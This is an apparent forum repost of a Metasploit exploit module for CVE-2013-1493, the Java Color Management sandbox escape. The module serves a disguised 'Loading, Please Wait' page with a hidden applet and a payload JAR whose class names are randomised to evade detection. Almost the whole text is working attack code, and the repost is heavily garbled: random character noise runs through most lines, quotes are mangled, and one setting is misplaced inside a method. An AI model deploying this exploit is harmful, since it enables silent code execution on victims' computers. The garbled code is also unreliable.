##
1 A a( t2 Y2 {; O* I9 F! [2 o
1 D( F7 D( y4 e3 v# This file is part of the Metasploit Framework and may be subject to# o( S" f# q, j: V4 B
# redistribution and commercial restrictions. Please see the Metasploit2 \" v8 L/ {& g- E( z+ a
# web site for more information on licensing and terms of use.* I) B. E9 W, ~/ @+ g8 a* q7 k1 N- }9 c. {
# http://metasploit.com/* A0 n; d# N3 C+ c9 c8 P
##. p. V- O6 m; g! c5 J3 W
require ‘msf/core’
. D% U. \7 u# Y9 O6 A3 {& L2 prequire ‘rex’! |: G0 z3 E* d0 N3 ^1 G
class Metasploit3 < Msf::Exploit::Remote
- e4 w6 A7 B4 J% K" o( b) uRank = NormalRanking6 T% J3 t6 k5 r: `5 `( E
include Msf::Exploit::Remote::HttpServer::HTML
' X. A: [6 n* I# y/ v2 cinclude Msf::Exploit::EXE
) P! k C6 F* w7 I3 O2 uinclude Msf::Exploit::Remote::BrowserAutopwn
) |7 l' K% R" B8 Cautopwn_info({ :javascript => false })
K( g& w B1 V2 Y9 b8 U$ e' Y% `" Qdef initialize( info = {} )" k1 c3 B; M. q' O
super( update_info( info,
9 [* t |6 ]2 Y" O; Z‘Name’ => ‘Java CMM Remote Code Execution’,+ b0 S2 C, x4 L S* s+ g
‘Description’ => %q{5 l$ y* @# m; l# Z9 I- |, c/ v
This module abuses the Color Management classes from a Java Applet to run
; l3 j6 n2 m7 P3 sarbitrary Java code outside of the sandbox as exploited in the wild in February. @, a+ L/ x) T4 n' r
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u412 Z* o/ v( k- h3 H: h- P
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
5 e. ?( Q( ^6 D/ a% ]systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
' n# r! w8 y: ]7 P& }7 G$ twarning in order to run the malicious applet.4 o5 `$ I* |3 _$ `# W- u$ R4 n) ~
},) g- ^ d2 Q9 F) L$ V
‘License’ => MSF_LICENSE,
, ~, u9 I5 D9 ~# [‘Author’ =>( _! T9 ~$ l& _2 b
'Unknown', # Vulnerability discovery and Exploit5 X+ r- i: F) }
'juan vazquez' # Metasploit module (just ported the published exploit)( d# k Q0 D& m7 y; b D7 Q
],
5 r8 l0 L+ Z7 X3 g‘References’ =>
) U# s* B! a7 f: l[2 u5 e D9 y3 }0 e! {" Q$ P
[ 'CVE', '2013-1493' ],
( y- f3 j+ k, T9 Z9 a2 ?1 b c( t! @[ 'OSVDB', '90737' ],
8 P3 c4 J8 q! |' ~: ~ x% M[ 'BID', '58238' ],
# z0 G8 a" C( d* l& o/ ~[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
! I6 ]( `/ t1 m2 E* S7 |[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
$ m5 W/ U) o9 p+ N[ 'URL', 'http://pastie.org/pastes/6581034' ]) t) J/ _4 }8 ^8 T/ p+ m' f. z
],
9 x4 S9 z4 G2 r2 N; b& {: @‘Platform’ => [ 'win', 'java' ],1 K/ x% `$ p! d
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },' g4 t4 d2 j( y9 w. k, p
‘Targets’ =>1 v# X0 E0 @, A' [/ [: J# [) @
[
( r+ e! M! B3 }& y$ s9 r# p q7 d/ L% n[ 'Generic (Java Payload)',
5 b* n- D2 t3 e8 v' _" |0 f5 U{
4 M. l1 _8 w. S' n; N) D'Platform' => 'java',! v+ t+ C. r: f
'Arch' => ARCH_JAVA
5 P. r/ n' N* r) s& N1 x}% r5 E2 `- z: v
],
6 t% T4 @/ i; E- `' S[ 'Windows x86 (Native Payload)',
* q9 ^" ?: E+ Z g% y5 ?{. Y% ?0 O3 t0 m
'Platform' => 'win',2 [% ^5 U$ D0 i
'Arch' => ARCH_X86
9 J9 j0 m; `% C k9 |) G}' U) V3 `' v+ T; ~$ o- M; ~
]
8 O0 q1 Q# j+ Z+ Z1 X2 Y],0 Q0 T# B4 D: f
‘‘DisclosureDate’ => ‘Mar 01 2013′
% n* i) {; r+ p% Z5 n! H' m))
* o8 }$ L1 J/ f- ^: Send
. y) c$ @ o7 s' D6 z+ ldef setup+ H6 \7 u; [( F& u6 w+ S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
( i& D% u3 P6 k& k, \: N@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& F7 \$ Y# S5 [' k9 M! M! Z4 E9 lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
* n1 k% \% b# r; j5 W. o@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
[0 o; ~7 r; W; Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)9 G g' f/ b) Y: |) u% m1 L
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& H7 h* m* p T, V4 \1 i7 W
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
$ ?$ _8 X; C; P* m- G8 K8 Z@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- L7 h. O* T7 X7 S0 A: t@init_class_name = rand_text_alpha(“Init”.length)8 m0 M) T% J, I3 ]3 ]+ R
@init_class.gsub!(“Init”, @init_class_name)
- M; b" ?" k, Q" Dsuper
8 v$ W, V3 U X0 ]9 P6 mend) ?/ @ M% u9 _) b* [
def on_request_uri(cli, request)$ @. U' H- V1 s' F8 g" ?
print_status(“handling request for #{request.uri}”)& W2 p& l# ~! g1 I
case request.uri- ~5 z8 I4 \ f0 Q+ V
when /\.jar$/i* W6 D, P$ [- B3 R2 p. i' S
jar = payload.encoded_jar
( m- @! F+ b. g/ G0 c+ Xjar.add_file(“#{@init_class_name}.class”, @init_class)# b" k# m0 @0 |# i* P) M) j
jar.add_file(“Leak.class”, @leak_class)
( G& {6 k: }! m) R3 H* fjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
9 X, B. y' z1 {$ `5 \: Z1 J$ D! Gjar.add_file(“MyColorSpace.class”, @color_space_class)
: M0 n* \; T7 k; {0 [" @DefaultTarget’ => 1,) {% g6 k) @$ s) i7 K
metasploit_str = rand_text_alpha(“metasploit”.length) C# Q& X$ ?' u. t. t x+ d) q8 h5 w
payload_str = rand_text_alpha(“payload”.length)
6 M" ^( l7 J4 g- z0 [ ]# F, wjar.entries.each { |entry|/ a# G- @! {) y3 {
entry.name.gsub!(“metasploit”, metasploit_str)
. W- {! X3 B( t% O0 C2 G3 p* Ventry.name.gsub!(“Payload”, payload_str)
1 F3 y$ V: n' rentry.data = entry.data.gsub(“metasploit”, metasploit_str)
0 J+ L- W( I8 Q% }entry.data = entry.data.gsub(“Payload”, payload_str)9 J) Q& @/ M/ J- M
} d3 Z$ [3 h" h% |
jar.build_manifest
3 T# y$ Z0 L+ d1 ?4 @' }send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” }) E4 ~3 \& o& `0 o( p7 M1 i9 f* X! C
when /\/$/
( G1 Q* J& ]0 I- }2 }payload = regenerate_payload(cli)+ c, T i/ C# i% q5 d
if not payload
4 b+ ]* X7 K7 y, Tprint_error(“Failed to generate the payload.”)+ v5 Z: |+ ^; x* E8 i
send_not_found(cli)
3 [+ T( c3 p7 p ^8 y8 \7 q4 l, creturn3 G' |5 A# K4 p6 _* G3 b$ e
end
8 n1 v* E# g+ h% T0 \4 R+ p/ F3 Y9 tsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })9 o2 L# E I$ m9 S, N3 q
else
1 P2 [4 `/ r% L( qsend_redirect(cli, get_resource() + ‘/’, ”)
9 |. \1 G8 k% x9 Yend
/ l7 x! d! t) }& B+ w3 Mend* H+ D( ]3 V' s- [8 ]* {1 j
def generate_html
9 Y! h" b: k \$ l9 @' Mhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
5 D6 s R/ L4 H- z2 ~ h1 Zhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|5 k" w5 k. {+ w
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|3 R* v5 D5 C- o$ V; U9 I& o: Q9 F
html += %Q|</applet></body></html>|
0 J: O& t9 f4 E: f1 k9 P; l5 \return html
6 `8 C7 j5 T4 B m) Dend# e2 h0 S# A3 R) }& J
end# d# t6 a8 ?5 K b( |7 \
end3 m7 ]0 x( r0 P" h1 V1 s: ~% }4 J
|
发表于 2013-4-4 17:31:17
收藏
支持
反对